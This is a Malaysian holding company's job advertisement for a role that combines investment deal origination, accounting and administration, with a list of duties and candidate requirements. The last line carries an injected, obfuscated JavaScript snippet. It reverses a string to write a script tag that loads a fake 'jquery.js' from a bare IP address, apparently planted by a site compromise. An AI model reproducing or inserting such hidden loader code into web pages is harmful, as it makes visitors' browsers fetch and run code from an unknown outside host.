Industry : Holding Co
Candidates armed with experience in venture capital / private equity and/or investment banking is an advantage.
Relationship Managers, or executives from major audit or consulting firms with strong interpersonal skills who are good at an origination role will also be suitable and considered for this role. Strong research and analytical skills and a good team player are expected of this role.
• Assist Founders in sourcing for / originating deals and investment opportunities in the Malaysian and regional markets.
• Develop and maintain a network with the venture capital / private equity community to generate constant deal-flow for further evaluation.
• Provide support in execution, including negotiating with potential investees, deal structuring and conducting due diligence exercises on potential deals and investments.
• Assist in preparation of financial models, research and analysis reports, and investment proposals.
• Ensure compliance in execution and monitoring of investment transactions.
• Conduct post-investment activities such as portfolio monitoring and reporting on a monthly, quarterly and yearly basis.
• Prepare full set of accounts, GL, AR & AP and timely month end and year end closing
• Generate financial statement, management report, audit schedule, tax computation and bank reconciliation.
• Supervise the updating and maintenance of accounting records and all relevant journals.
• To ensure proper classification / chart of accounts, right double entry and correct positioning.
• Liaise with auditor and tax agents.
• Any other duties assigned by immediate superiors.
Departmental Administrator Sub-scope
• Note taking, taking of meeting minutes, drafting of emails and other correspondences.
• Managing diaries and organizing/scheduling of meetings and appointments.
• Managing databases and filing systems (both electronic and hardcopy).
• Implementing and maintaining procedures/administrative systems.
• Assist in preparation of marketing materials and information packs.
• Manage, file, retrieve and update all documentation in an orderly and systematic manner.
• Candidate should possess a Diploma or Degree in Finance or Accounting
• Minimum 2 years working experience in a finance or accounting role (prior work experience in an accounting or auditing is an added advantage)
• Flexibility and adaptability with good organisational skills and the ability to multitask
• Good interpersonal skills and able to work independently
• Discretion and trustworthiness: position will often be party of confidential information
• Good oral and written communication skills
• Conversant in English, Bahasa Malaysia and Mandarin (an added advantage)
• Proficient in Microsoft office applications
• Initiative and able to meet tight reporting deadlines in a challenging environment document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))